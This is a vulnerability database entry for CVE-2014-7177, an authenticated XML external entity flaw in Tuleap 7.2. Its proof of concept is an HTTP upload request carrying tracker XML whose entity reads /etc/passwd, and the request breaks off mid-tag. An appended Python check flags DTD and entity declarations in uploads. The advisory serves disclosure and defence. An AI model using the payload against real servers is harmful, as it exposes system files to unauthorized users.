Tuleap 7.2 XXE Injection

32   2019-08-05 08:08   nipc
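Vulnerability information
Vulnerability ID: 1287
CVE ID: CVE-2014-7177
Vulnerability type: -
Source: cxs
Published: 2014-10-29
CVSS
CVSS score: 4/10
Severity: High
Exploit range: Remote
Attack complexity: Low
Authentication: Single time
Vulnerability description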

WLB-2014100176 | http://cxsecurity.com/issue/WLB-2014100176 | Bug: Tuleap 7.2 XXE Injection ( Ascii Version ) | Tuleap 7.2 XXE Injection | 2014.10.29 | Jerzy Kramarz | High | N/A | CVE-2014-7177 | No | Yes | 4/10 | 2.9/10 | 8/10 | Remote | Single time | Partial | None | None

Vulnerability title: Tuleap <= 7.2 External XML Entity Injection in Enalean Tuleap
CVE: CVE-2014-7177
Vendor: Enalean
Product: Tuleap
Affected version: 7.2 and earlier
Fixed version: 7.4.99.5
Reported by: Jerzy Kramarz

Details:

Multiple XML External Entity (XXE) injection issues have been found and confirmed within the software as an authenticated user.
A successful attack could allow an authenticated attacker to access local system files.

POC

Vulnerability title: Tuleap <= 7.2 External XML Entity Injection in Enalean Tuleap
CVE: CVE-2014-7177
Vendor: Enalean
Product: Tuleap
Affected version: 7.2 and earlier
Fixed version: 7.4.99.5
Reported by: Jerzy Kramarz

Details:

Multiple XML External Entity (XXE) injection issues have been found and confirmed within the software as an authenticated user.
A successful attack could allow an authenticated attacker to access local system files. The following example vectors can be used as PoC to confirm the vulnerability.

Vulnerability 1:

1) Upload an XXE using the following request:

POST /plugins/tracker/?group_id=102&func=create HTTP/1.1
Host: [ip]
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://[ip]/plugins/tracker/?group_id=102&func=create
Cookie: PHPSESSID=ujjrs6r6mssqn5gd5j83cmner4; TULEAP_session_hash=4a8075ce16e338b4015405cfa2816319
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------25777276834778
Content-Length: 10561

-----------------------------25777276834778
Content-Disposition: form-data; name="group_id"

102
-----------------------------25777276834778
Content-Disposition: form-data; name="func"

docreate
-----------------------------25777276834778
Content-Disposition: form-data; name="group_id_template"

100
-----------------------------25777276834778
Content-Disposition: form-data; name="tracker_new_prjname"

Commencez à taper
-----------------------------25777276834778
Content-Disposition: form-data; name="create_mode"

xml
-----------------------------25777276834778
Content-Disposition: form-data; name="tracker_new_xml_file"; filename="xee.xml"
Content-Type: text/xml

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE str [<!ENTITY xxe SYSTEM "/etc/passwd">]>
<tracker instantiate_for_new_projects="0">
  <name>123&xxe;</name>
  <item_name>e123&xxe;</item_name>
  <description>123&xxe;</description>
  <cannedResponses/>
  <formElements>
    <formElement type="file" ID="F1" rank="0" use_it="0">
      <name>attachment</name>
      <label>Attachments</label>
    </formElement>
    <formElement type="text" ID="F2" rank="2" use_it="0">
      <name>details</name>
      <label>Original Submission</label>
      <description>A full description of the artifact&xxe;</description>
      <properties rows="7" cols="60"/>
    </formElement>
    <formElement type="string" ID="F3" rank="4" use_it="0" required="1">
      <name>summary</name>
      <label>Summary</label>
      <description>One line description of the artifact&xxe;</description>
      <properties maxchars="150" size="60"/>
    </formElement>
    <formElement type="tbl" ID="F4" rank="6" use_it="0">
      <name>cc</name>
      <label>CC</label>
      <properties hint="Type in a search term"/>
      <bind type="static" is_rank_alpha="0"/>
    </formElement>
    <formElement type="sb" ID="F7" rank="12" use_it="0">
      <name>status_id</name>
      <label>Status</label>
      <description>Artifact Status</description>
      <bind type="static" is_rank_alpha="0">
        <items>
          <item ID="F7-V0" label="Open">
            <description>The artifact has been submitted&xxe;</description>
          </item>
          <item ID="F7-V1" label="Closed">
            <description>The artifact is no longer active. See the Resolution field for details on how it was resolved.&xxe;</description>
          </item>
        </items>
      </bind>
    </formElement>
    <formElement type="sb" ID="F8" rank="14" use_it="0">
      <name>assigned_to</name>
      <label>Assigned to</label>
      <description>Who is in charge of solving the artifact&xxe;</descriptio
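
A pre-import check that an upload handler could run on the tracker_new_xml_file part to flag DOCTYPE and entity declarations before the template is parsed, given here as an added example and not code from the advisory or from Tuleap. The function names, the reject-any-DTD policy and both sample documents are assumptions constructed for illustration.

```python
import xml.parsers.expat

# Constructed sample uploads (not taken from a real Tuleap instance).
BENIGN = b"""<?xml version="1.0" encoding="UTF-8"?>
<tracker instantiate_for_new_projects="0"><name>demo</name></tracker>"""
WITH_DTD = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE str [<!ENTITY xxe SYSTEM "file:///constructed/placeholder">]>
<tracker instantiate_for_new_projects="0"><name>demo&xxe;</name></tracker>"""


def audit_tracker_xml(data: bytes) -> list:
    """Return (kind, name, system_id) findings; nothing external is fetched."""
    findings = []
    parser = xml.parsers.expat.ParserCreate()

    def on_doctype(name, sysid, pubid, has_internal_subset):
        findings.append(("doctype", name, sysid))

    def on_entity_decl(name, is_param, value, base, sysid, pubid, notation):
        # value is None for external entities (SYSTEM/PUBLIC identifiers).
        kind = "external-entity" if value is None else "internal-entity"
        findings.append((kind, name, sysid))

    def on_external_ref(context, base, sysid, pubid):
        # Record the reference and continue; this handler opens nothing.
        findings.append(("external-reference", context, sysid))
        return 1

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity_decl
    parser.ExternalEntityRefHandler = on_external_ref
    try:
        parser.Parse(data, True)
    except xml.parsers.expat.ExpatError as exc:
        findings.append(("malformed", str(exc), None))
    return findings


def accept_upload(data: bytes) -> bool:
    """Assumed policy: a tracker template needs no DTD, so any finding rejects."""
    return not audit_tracker_xml(data)


if __name__ == "__main__":
    for label, doc in (("benign", BENIGN), ("with DTD", WITH_DTD)):
        print(label, accept_upload(doc), audit_tracker_xml(doc))
```

The findings list is suitable for logging alongside the authenticated user and project ID, so rejected uploads leave an audit trail.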